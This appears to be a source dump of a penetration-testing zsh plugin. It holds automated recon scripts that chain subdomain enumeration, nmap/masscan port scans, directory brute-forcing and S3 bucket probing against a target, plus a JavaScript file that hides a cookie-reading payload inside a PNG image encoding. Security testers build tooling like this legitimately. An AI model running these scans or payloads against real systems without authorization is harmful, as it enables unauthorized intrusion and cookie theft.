# Contributors:
#############################################################
# check for essential packages
dpkg -l | grep -qw rlwrap || sudo apt-get -y install rlwrap
dpkg -l | grep -qw git || sudo apt-get -y install git
# check for directories
mkdir -p $HOME/.quiver/{vars,globals}
#############################################################
# Constants
#############################################################
export __PLUGIN="${0:A:h}"
export __VER=$(cat ${__PLUGIN}/VERSION)
export __LOGFILE="${__PLUGIN}/log.txt"
export __REMOTE_CHK="${__PLUGIN}/remote_checked.txt"
export __REMOTE_VER="${__PLUGIN}/remote_ver.txt"
export __STATUS=$(cd ${__PLUGIN} && git status | grep On | cut -d" " -f2,3)
export __VARS=$HOME/.quiver/vars
export __GLOBALS=$HOME/.quiver/globals
export __PAYLOADS="$__PLUGIN/payloads"
export __SCRIPTS="$__PLUGIN/scripts"
export __TOOLS="$HOME/tools"
#############################################################
# Self Update
#############################################################
__version-check() {
local seconds=$((60*60*24*1))
if test -f "$__REMOTE_CHK" ; then
if test "$(($(date "+%s")-$(date -f "$__REMOTE_CHK" "+%s")))" -lt "$seconds" ; then
echo "[*] Version already checked today: $__REMOTE_CHK" >> ${__LOGFILE}
exit 1
fi
fi
date -R > $__REMOTE_CHK
echo "$(curl -s https://raw.githubusercontent.com/stevemcilwain/quiver/master/VERSION)" > $__REMOTE_VER
echo "[*] Version checked and stored in: $__REMOTE_VER" >> ${__LOGFILE}
}
(__version-check &)
#############################################################
# Diagnostic Log
#############################################################
echo "Quiver ${__VER} in ${__PLUGIN}" > ${__LOGFILE}
echo " " >> ${__LOGFILE}
echo "[*] loading... " >> ${__LOGFILE}
#Source all qq scripts
for f in ${0:A:h}/modules/qq* ; do
echo "[+] sourcing $f ... " >> ${__LOGFILE}
source $f >> ${__LOGFILE} 2>&1
done
source ${__ALIASES}
# completion enhancement
# zstyle ':completion:*' matcher-list 'r:|[-]=**'
ZSTYLE_ORIG=`zstyle -L ':completion:\*' matcher-list`
ZSTYLE_NEW="${ZSTYLE_ORIG} 'r:|[-]=**'"
eval ${ZSTYLE_NEW}
echo "[*] quiver loaded." >> ${__LOGFILE}
#############################################################
# Shell Log
#############################################################
echo " "
if [[ -f "$__REMOTE_VER" ]]; then
echo "[*] Remote version file exists: $__REMOTE_VER " >> ${__LOGFILE}
rv=$(cat ${__REMOTE_VER})
if [[ ! -z $rv ]]; then
echo "[*] Remote version is |${rv}|" >> ${__LOGFILE}
[[ "$rv" == "$__VER" ]] && __info "Quiver is up to date" || __warn "Quiver update available: $rv, use qq-update to install"
fi
fi
__info "Quiver ${__VER} ZSH plugin loaded "
================================================
FILE: scripts/dns-reverse-brute.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# dns-reverse-brute
#############################################################
#[[ -z $1 ]] && echo -e "[!] Missing argument.\nUsage: zsh $0 <file>" && exit
cat $1 | while read domain; do if host -t A "$domain" | awk '{print $NF}' | grep -E '^(192\.168\.|172\.1[6789]\.|172\.2[0-9]\.|172\.3[01]\.|10\.)' &>/dev/null; then echo $domain; fi; done
================================================
FILE: scripts/image-gen.js
================================================
(function() {
function encode(a) {
if (a.length) {
var c = a.length,
e = Math.ceil(Math.sqrt(c / 3)),
f = e,
g = document.createElement("canvas"),
h = g.getContext("2d");
g.width = e, g.height = f;
var j = h.getImageData(0, 0, e, f),
k = j.data,
l = 0;
for (var m = 0; m < f; m++)
for (var n = 0; n < e; n++) {
var o = 4 * (m * e) + 4 * n,
p = a[l++],
q = a[l++],
r = a[l++];
(p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)
}
return h.putImageData(j, 0, 0), h.canvas.toDataURL()
}
}
var ord = function ord(a) {
var c = a + "",
e = c.charCodeAt(0);
if (55296 <= e && 56319 >= e) {
if (1 === c.length) return e;
var f = c.charCodeAt(1);
return 1024 * (e - 55296) + (f - 56320) + 65536
}
return 56320 <= e && 57343 >= e ? e : e
},
d = document,
b = d.body,
img = new Image;
var stringenc = "Hello, World!";
img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img)
})();
(function() {
function encode(a) {
if (a.length) {
var c = a.length,
e = Math.ceil(Math.sqrt(c / 3)),
f = e,
g = document.createElement("canvas"),
h = g.getContext("2d");
g.width = e, g.height = f;
var j = h.getImageData(0, 0, e, f),
k = j.data,
l = 0;
for (var m = 0; m < f; m++)
for (var n = 0; n < e; n++) {
var o = 4 * (m * e) + 4 * n,
p = a[l++],
q = a[l++],
r = a[l++];
(p || q || r) && (p && (k[o] = ord(p)), q && (k[o + 1] = ord(q)), r && (k[o + 2] = ord(r)), k[o + 3] = 255)
}
return h.putImageData(j, 0, 0), h.canvas.toDataURL()
}
}
var ord = function ord(a) {
var c = a + "",
e = c.charCodeAt(0);
if (55296 <= e && 56319 >= e) {
if (1 === c.length) return e;
var f = c.charCodeAt(1);
return 1024 * (e - 55296) + (f - 56320) + 65536
}
return 56320 <= e && 57343 >= e ? e : e
},
d = document,
b = d.body,
img = new Image;
var stringenc = "function asd() {\
var d = document;\
var c = 'cookie';\
alert(d[c]);\
};asd();/*Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam blandit metus vel elementum. Mauris mi tortor, congue eget fringilla id, tempus a tellus. Morbi laoreet vitae ipsum vel dapibus. Nunc eu faucibus ligula. Donec maximus malesuada justo. Nulla congue, risus quis dapibus porttitor, metus quam rutrum dolor, ac maximus nibh metus quis enim. Aenean hendrerit venenatis massa ac gravida. Donec at nisi quis ex sollicitudin bibendum sit amet ac quam.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Phasellus vel bibendum mi. Nam hendrerit justo eget massa lobortis sodales. Morbi nec ligula sem. Nullam felis nibh, tempor lobortis leo eu, vehicula ornare libero. Vestibulum lorem sapien, rhoncus nec ante nec, dignissim tincidunt urna. Sed rutrum tellus at nisl fringilla semper. Duis pharetra dui turpis, sed pellentesque magna porttitor vitae. Phasellus pharetra justo eu lectus ullamcorper, ut mollis lectus dictum. Duis efficitur tellus sed ante semper, eget iaculis nunc iaculis. Suspendisse tristique non ante ac lobortis.\
Phasellus auctor lectus nibh, non vulputate sem tristique sit amet. Pellentesque fringilla dolor vitae dapibus porta. Vivamus nec neque ante. In commodo neque ut turpis feugiat tempor. Duis pulvinar enim imperdiet condimentum iaculis. Maecenas ac pellentesque erat. Sed tempor a turpis eu eleifend. Cras elit nibh, aliquam ac sapien vulputate, accumsan rhoncus nunc. Nulla ut porta arcu. Sed imperdiet luctus sapien, eu viverra est lacinia in. Curabitur volutpat, enim nec hendrerit malesuada, felis libero facilisis enim, vitae tincidunt felis libero nec tortor. Sed lorem tellus, fringilla lobortis pharetra vitae, dignissim ac nibh. Curabitur eu ultricies mi. Aliquam erat volutpat. Aenean tincidunt diam quis hendrerit euismod. Etiam sed nibh eu est dignissim ultricies.\
Sed cursus felis eu tellus sollicitudin, a luctus lacus tempor. Aenean elit est, vulputate vitae commodo et, pellentesque vitae dui. Etiam volutpat accumsan congue. Mauris maximus at lorem nec auctor. Vestibulum porta magna et suscipit faucibus. Vestibulum sit amet neque ligula. In hac habitasse platea dictumst. Nullam sed tortor congue, volutpat lectus sit amet, convallis ante.\
Vestibulum tincidunt diam vel diam semper posuere. Nulla facilisi. Curabitur a facilisis lorem, eu porta leo. Sed pharetra eros et malesuada mattis. Donec tincidunt elementum mauris quis commodo. Donec nec vulputate nulla. Nunc luctus orci lacinia nunc sodales, vitae cursus quam tempor. Cras ullamcorper ullamcorper urna vitae pulvinar. Curabitur ac pretium felis. Vivamus vel scelerisque nisi. Pellentesque lacinia consequat nibh, vitae rhoncus tellus faucibus eget. Ut pulvinar est non tellus tristique sodales. Aenean eget velit non turpis tristique pretium id eu dolor. Nulla sed eros quis urna facilisis scelerisque. Nam orci neque, finibus eget odio et, elementum finibus erat.*/";
img.src = encode(stringenc), b.innerHTML = "", b.appendChild(img)
})();
================================================
FILE: scripts/recon.zsh
================================================
#!/usr/bin/env zsh
#continue on errors
set +e
autoload colors; colors
__info() echo "$fg[blue][*] $@ $reset_color"
__ok() echo "$fg[green] [+] $@ $reset_color"
__warn() echo "$fg[yellow][>] $@ $reset_color"
__err() echo "$fg[red][!] $@ $reset_color"
#############################################################
# Recon
#############################################################
[[ -z $1 ]] && __err "Missing argument.\nUsage: zsh $0 <domain> <org> <outdir>" && exit
[[ -z $2 ]] && __err "Missing argument.\nUsage: zsh $0 <domain> <org> <outdir>" && exit
[[ -z $3 ]] && __err "Missing argument.\nUsage: zsh $0 <domain> <org> <outdir>" && exit
export DOMAIN=$1
export ORG=$2
export DIR=$3
export UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
export F_ASN="${DIR}/asn.txt"
export F_CIDR="${DIR}/cidr.txt"
export F_SUBS="${DIR}/subs.txt"
export F_SUBS_RES="${DIR}/subs.resolved.txt"
export F_HOSTS="${DIR}/hostnames.txt"
export F_HOSTS_IP="${DIR}/hostips.txt"
export F_WEB="${DIR}/urls.txt"
export PORTS="21,22,25,80,443,135-139,445,3389,3306,1433,389,636,88,111,2049,1521,110,143,161,6379,5900,2222,4443,8000,8888,8080,9200"
#############################################################
# Startup
#############################################################
__info "Recon.zsh running... "
__info "Domain: ${DOMAIN} Org: ${ORG}"
__info "Using current directory for output: ${DIR}"
#############################################################
# Steps
#############################################################
org() {
__ok "metagoofil'ing files"
mkdir -p ${DIR}/files
metagoofil -u "${UA}" -d ${DOMAIN} -t pdf,doc,docx,ppt,pptx,xls,xlsx -w -l 100 -n 50 -o ${DIR}/files > /dev/null 2>&1 &
}
network() {
__ok "Amass'ing ASNs"
amass intel -org "${ORG}" | cut -d, -f1 > ${F_ASN}
__ok "BGPview'ing CIDRs"
for asn in $(cat ${F_ASN})
do
if [[ ! -z ${asn} ]]
then
curl -s https://api.bgpview.io/asn/${asn}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' > ${F_CIDR}
fi
done
__ok "dnsrecon'ing PTRs"
network_dnsrecon
#__ok "masscan'ing CIDRs"
#network_masscan
}
network_dnsrecon() {
mkdir -p ${DIR}/ptr
for cidr in $(cat ${F_CIDR})
do
if [[ ! -z ${cidr} ]]
then
local net=$(echo ${cidr} | cut -d/ -f1)
dnsrecon -d ${DOMAIN} -r ${cidr} -n 1.1.1.1 -c ${DIR}/ptr/ptr.${net}.csv > /dev/null 2>&1
fi
done
}
network_masscan() {
mkdir -p ${DIR}/net
for cidr in $(cat ${F_CIDR})
do
if [[ ! -z ${cidr} ]]
then
local net=$(echo ${cidr} | cut -d/ -f1)
sudo masscan ${cidr} -p${PORTS} -oL ${DIR}/net/masscan.${net}.txt > /dev/null 2>&1
fi
done
}
domains() {
echo "${DOMAIN}" > ${DIR}/domains.txt
__ok "Subfinder'ing "
subfinder -d ${DOMAIN} -nW -silent >> ${F_SUBS} > /dev/null 2>&1
__ok "crt.sh'ing "
curl -s 'https://crt.sh/?q=%.$DOMAIN' | grep -i "${DOMAIN}" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v " " | sort -u >> ${F_SUBS} > /dev/null 2>&1
__ok "waybackurls'ing... "
echo ${DOMAIN} | waybackurls | cut -d "/" -f3 | sort -u | grep -v ":80" >> ${F_SUBS} > /dev/null 2>&1
__ok "sorting results "
cat ${F_SUBS} | sort -u -o ${F_SUBS} > /dev/null 2>&1
}
lookups() {
__ok "massdns'ing domains"
/opt/recon/massdns/bin/massdns -r /opt/recon/massdns/lists/resolvers.txt -t A -o S ${F_SUBS} -w ${F_SUBS_RES} > /dev/null 2>&1
__ok "extracting resolved hostnames"
sed 's/A.*//' ${F_SUBS_RES} | sed 's/CN.*//' | sed 's/\..$//' | sort -u >> ${F_HOSTS} > /dev/null 2>&1
__ok "extracting resolved IP addresses"
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' ${F_SUBS_RES} | sort -u | sort -V -o ${F_HOSTS_IP} > /dev/null 2>&1
}
scans() {
__ok "scanning host IP's"
mkdir -p ${DIR}/hosts
for h in $(cat ${F_HOSTS_IP})
do
__ok "...scanning ${h}"
mkdir -p ${DIR}/hosts/${h}
nmap -sT -p ${PORTS} -T4 --open ${h} -oA ${DIR}/hosts/${h}/scan > /dev/null 2>&1
done
}
web() {
__ok "httprobing resolved hosts"
cat ${F_HOSTS} | httprobe -t 3000 -s -p https:443 | sed 's/....$//' >> ${F_WEB} > /dev/null 2>&1
mkdir -p ${DIR}/web
for url in $(cat ${F_WEB})
do
__ok "...enumerating ${url} ... "
local host=$(echo ${url} | cut -d/ -f3)
local hdir=${DIR}/web/${host}
mkdir -p ${hdir}
__ok "Getting IP address"
host ${host} > ${hdir}/ip.txt > /dev/null 2>&1
__ok "Curling robots.txt"
curl -s -L ${url}/robots.txt -o ${hdir}/robots.txt > /dev/null 2>&1
__ok "Whatwebbing"
whatweb ${url} -a 1 > ${hdir}/whatweb.txt > /dev/null 2>&1
__ok "Wafw00fing"
wafw00f ${url} > ${hdir}/waf.txt > /dev/null 2>&1
__ok "Gobustering"
gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/common.txt -t10 -k -o ${hdir}/gobuster.txt > /dev/null 2>&1
__ok "S3 Bucketing"
aws s3 ls s3://${host} > s3.txt > /dev/null 2>&1
done
}
#############################################################
# Workflow
#############################################################
__info "Searching for Org OSINT... "
org
__info "Mapping Network... "
network
__info "Collecting sub-domains..."
domains
__info "Resolving sub-domains... "
lookups
__info "Scanning IP addresses..."
scans
__info "Probing web servers..."
web
__info "Checking job completion..."
wait $(jobs -p)
__info "Recon completed"
echo " "
================================================
FILE: scripts/webrecon.zsh
================================================
red=`tput setaf 1`
green=`tput setaf 2`
yellow=`tput setaf 3`
reset=`tput sgr0`
echo -e "[*] webrecon.zsh "
echo -e "[*] source: $1"
echo -e " "
for url in $(cat $1);do
echo -e "[*] Enumerating ${url}"
############################################################
# Make directory
############################################################
host=$(echo $url | cut -d "/" -f3)
echo -e "${green} [+] Making directory ${host} ${reset}"
mkdir -p ${host}
############################################################
# Host
############################################################
echo -e "${green} [+] Getting IP address... ${reset}"
host ${host} | tee ${host}/ip.txt > /dev/null
############################################################
# Robots
############################################################
echo -e "${green} [+] Curling... robots.txt ${reset}"
curl -s -L ${url}/robots.txt -o ${host}/robots.txt
############################################################
# Ports
############################################################
echo -e "${green} [+] Nmapping... ${reset}"
nmap -sT --top-ports 100 --open ${host} -oA ${host}/ports > /dev/null
############################################################
# Whatweb
############################################################
echo -e "${green} [+] Whatwebbing... ${reset}"
whatweb ${url} -a 1 > ${host}/whatweb.txt 2> /dev/null
############################################################
# Wafw00f
############################################################
echo -e "${green} [+] Wafw00fing... ${reset}"
wafw00f ${url} > ${host}/waf.txt 2> /dev/null
############################################################
# Gobuster
############################################################
echo -e "${green} [+] Gobustering... ${reset}"
gobuster dir -q -z -u ${url} -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -k -o ${host}/gobuster-dirs.txt 2> /dev/null
############################################################
# Eyewitness
############################################################
#echo -e "${green} [+] Screenshotting... ${reset}"
#eyewitness --web --single ${url} -d ./${host}/screens --no-prompt &> /dev/null
############################################################
# AWS
############################################################
echo -e "${green} [+] S3 Bucketing... ${reset}"
aws s3 ls s3://${host} > s3.txt 2> /dev/null
echo -e " "
done
echo -e " "
echo -e "[*] Done"
================================================
FILE: scripts/wildcards.py
================================================
#!/usr/bin/env python3
# coding=utf-8
# *******************************************************************
# *** Wildcards ***
# * Description:
# A script that does recon on public bug bounty wildcard domains.
# * Version:
# v0.1
# * Homepage:
# https://github.com/stevemcilwain/wildcards
# * Author:
# Steve Mcilwain
# *******************************************************************
# Modules
import sys
import requests
import os
# Configuration
WILDCARDS_URL = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/wildcards.txt"
WILDCARDS_FILE = "wildcards.txt"
# Colors
def print_red(skk): print("\033[91m{}\033[00m" .format(skk))
def print_cyan(skk): print("\033[96m{}\033[00m" .format(skk))
def print_yellow(skk): print("\033[93m{}\033[00m" .format(skk))
# Workflow
def download_file_from_url(url, file):
result = False
r = requests.get(url, allow_redirects=True)
if r.status_code == 200:
with open(file, "wb") as f:
f.write(r.content)
result = True
else:
result = False
return (result, r.status_code)
def read_domains_from_file(file):
result = False
domains = set()
with open(file, "r") as f:
for line in f:
if line.startswith("*."):
domain=line[2:].rstrip("\n")
domains.add(domain)
result = True
return (result, domains)
def main():
print(" ")
print_cyan("Wildcards")
print(" ")
print_cyan("[INFO] Roundin 'em up!")
results = download_file_from_url(WILDCARDS_URL, WILDCARDS_FILE)
if not results[0]: sys.exit("[ERR] Failed to download file: {}".format(results[1]))
print("[INFO] Wrangled into: {}".format(WILDCARDS_FILE))
results = read_domains_from_file(WILDCARDS_FILE)
if not results[0]: sys.exit("[ERR] Failed to download file")
#for domain in domains:
#print("Domain: " + domain)
if (__name__ == "__main__"):
try:
main()
except KeyboardInterrupt:
print('\nKeyboardInterrupt Detected.')
print('\nExiting...')
exit(0)
================================================
FILE: scripts/wildcards.sh
================================================
#!/usr/bin/env bash
#############################################################
# wildcards.sh
#
# This script is intended to run on a VPS as a cron job.
# Run it nightly and it will any newly discovered sub domains
# from the list of root domains that use wildcard scope.
#############################################################
# Set an environment variable in your .bashrc for your Slack webhook
# export __WILDCARDS_SLACK="https://hooks.slack.com/services/<webhook>"
# Setup cron to run at a certain hour every night, example below at 2 am
# crontab -e
# m h dom mon dow command
# 0 2 * * * /bin/bash /path/to/wildcards.sh <domain> <webhook url>
DOMAIN=$1
SLACK=$2
if [[ -z "$DOMAIN" ]]
then
echo "[x] Missing domain"
exit 1
fi
echo $(date) >> log.txt
echo "$DOMAIN" >> log.txt
echo "$SLACK" >> log.txt
curl -X POST --data-urlencode payload="{\"text\": \"Wildcards starting for $DOMAIN \"}" $SLACK
amass enum -active -ip -d $DOMAIN
DIFF=$(amass track -d $DOMAIN -last 2 | grep Found | awk '{print $2}')
echo "Diff: $DIFF" >> log.txt
if [[ ! -z "$DIFF" ]]
then
curl -X POST --data-urlencode payload="{\"text\": \"$DIFF\"}" $SLACK
fi
curl -X POST --data-urlencode payload="{\"text\": \"Wildcards completed for $DOMAIN \"}" $SLACK
================================================
FILE: system/hidpi.sh
================================================
#!/usr/bin/env bash
xfconf-query -c xfwm4 -p /general/theme -s Kali-Dark-xHiDPI
xfconf-query -c xsettings -p /Gdk/WindowScalingFactor -n -t 'int' -s 2
cat <<- EOF >> ~/.xsessionrc
export QT_SCALE_FACTOR=2
export XCURSOR_SIZE=48
export GDK_SCALE=2
EOF
gitextract_8lk53koa/
├── .gitattributes
├── .gitignore
├── .vscode/
│ └── settings.json
├── LICENSE
├── README.md
├── RELEASES.md
├── VERSION
├── modules/
│ ├── qq-encoding.zsh
│ ├── qq-enum-dhcp.zsh
│ ├── qq-enum-dns.zsh
│ ├── qq-enum-ftp.zsh
│ ├── qq-enum-host.zsh
│ ├── qq-enum-kerb.zsh
│ ├── qq-enum-ldap.zsh
│ ├── qq-enum-mssql.zsh
│ ├── qq-enum-mysql.zsh
│ ├── qq-enum-network.zsh
│ ├── qq-enum-nfs.zsh
│ ├── qq-enum-oracle.zsh
│ ├── qq-enum-pop3.zsh
│ ├── qq-enum-rdp.zsh
│ ├── qq-enum-smb.zsh
│ ├── qq-enum-web-aws.zsh
│ ├── qq-enum-web-dirs.zsh
│ ├── qq-enum-web-eslastic.zsh
│ ├── qq-enum-web-fuzz.zsh
│ ├── qq-enum-web-js.zsh
│ ├── qq-enum-web-php.zsh
│ ├── qq-enum-web-ssl.zsh
│ ├── qq-enum-web-vuln.zsh
│ ├── qq-enum-web.zsh
│ ├── qq-exploit.zsh
│ ├── qq-install.zsh
│ ├── qq-kali.zsh
│ ├── qq-log.zsh
│ ├── qq-notes.zsh
│ ├── qq-pivot.zsh
│ ├── qq-project-custom.zsh
│ ├── qq-project.zsh
│ ├── qq-recon-domains.zsh
│ ├── qq-recon-github.zsh
│ ├── qq-recon-networks.zsh
│ ├── qq-recon-org.zsh
│ ├── qq-recon-subs.zsh
│ ├── qq-scripts.zsh
│ ├── qq-shell-handlers-msf.zsh
